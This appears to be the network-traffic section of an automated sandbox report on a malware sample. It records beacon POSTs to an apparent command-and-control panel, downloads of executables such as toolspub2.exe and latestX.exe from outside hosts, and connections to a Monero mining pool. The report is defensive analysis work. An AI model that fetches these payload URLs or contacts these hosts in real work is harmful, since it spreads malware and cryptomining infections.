Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
xmr-eu1.nanopool.org | 212.47.253.124 | |
pastebin.com | 104.20.68.143 | |
galandskiyher5.com | 194.169.175.127 | |
TCP Requests

Source | Destination | Hostname |
---|---|---|
192.168.56.101:49186 | 104.20.67.143:443 | pastebin.com |
192.168.56.101:49174 | 194.169.175.127:80 | galandskiyher5.com |
192.168.56.101:49171 | 5.42.65.80:80 | |
192.168.56.101:49179 | 5.42.65.80:80 | |
192.168.56.101:49187 | 51.15.193.130:14433 | xmr-eu1.nanopool.org |
192.168.56.101:49185 | 51.15.58.224:14433 | xmr-eu1.nanopool.org |
192.168.56.101:49181 | 79.137.192.18:80 | |
192.168.56.101:49178 | 95.214.27.254:80 | |
192.168.56.101:49180 | 95.214.27.254:80 | |
POST 200 http://5.42.65.80/8bmeVwqx/index.php

```http
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 90
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```

GET 200 http://galandskiyher5.com/downloads/toolspub2.exe

```http
GET /downloads/toolspub2.exe HTTP/1.1
Host: galandskiyher5.com

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Mon, 16 Oct 2023 00:43:08 GMT
Content-Type: application/x-msdos-program
Content-Length: 231936
Connection: close
Last-Modified: Mon, 16 Oct 2023 00:43:01 GMT
ETag: "38a00-607cab03a3f20"
Accept-Ranges: bytes
```

POST 200 http://5.42.65.80/8bmeVwqx/index.php

```http
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```

GET 404 http://95.214.27.254/getfile/taskhost.exe

```http
GET /getfile/taskhost.exe HTTP/1.1
Host: 95.214.27.254

HTTP/1.1 404 Not Found
Date: Mon, 16 Oct 2023 00:43:10 GMT
Server: Apache
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
```

POST 200 http://5.42.65.80/8bmeVwqx/index.php

```http
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```

GET 404 http://95.214.27.254/getfile/winlog.exe

```http
GET /getfile/winlog.exe HTTP/1.1
Host: 95.214.27.254

HTTP/1.1 404 Not Found
Date: Mon, 16 Oct 2023 00:43:12 GMT
Server: Apache
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
```

POST 200 http://5.42.65.80/8bmeVwqx/index.php

```http
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```

GET 404 http://95.214.27.254/getfile/msedge.exe

```http
GET /getfile/msedge.exe HTTP/1.1
Host: 95.214.27.254

HTTP/1.1 404 Not Found
Date: Mon, 16 Oct 2023 00:43:12 GMT
Server: Apache
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
```

POST 200 http://5.42.65.80/8bmeVwqx/index.php

```http
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```

GET 200 http://79.137.192.18/latestX.exe

```http
GET /latestX.exe HTTP/1.1
Host: 79.137.192.18

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:16 GMT
Content-Type: application/octet-stream
Content-Length: 5874968
Last-Modified: Sun, 06 Aug 2023 06:35:01 GMT
Connection: keep-alive
ETag: "64cf3f15-59a518"
Accept-Ranges: bytes
```

POST 200 http://5.42.65.80/8bmeVwqx/index.php

```http
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```

POST 200 http://5.42.65.80/8bmeVwqx/index.php

```http
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```

POST 200 http://5.42.65.80/8bmeVwqx/index.php

```http
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```

POST 200 http://5.42.65.80/8bmeVwqx/index.php

```http
POST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Oct 2023 00:43:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.3 192.168.56.101:49185 51.15.58.224:14433 | None | None | None |
TLS 1.3 192.168.56.101:49186 104.20.67.143:443 | None | None | None |
TLS 1.3 192.168.56.101:49187 51.15.193.130:14433 | None | None | None |
Snort Alerts
No Snort Alerts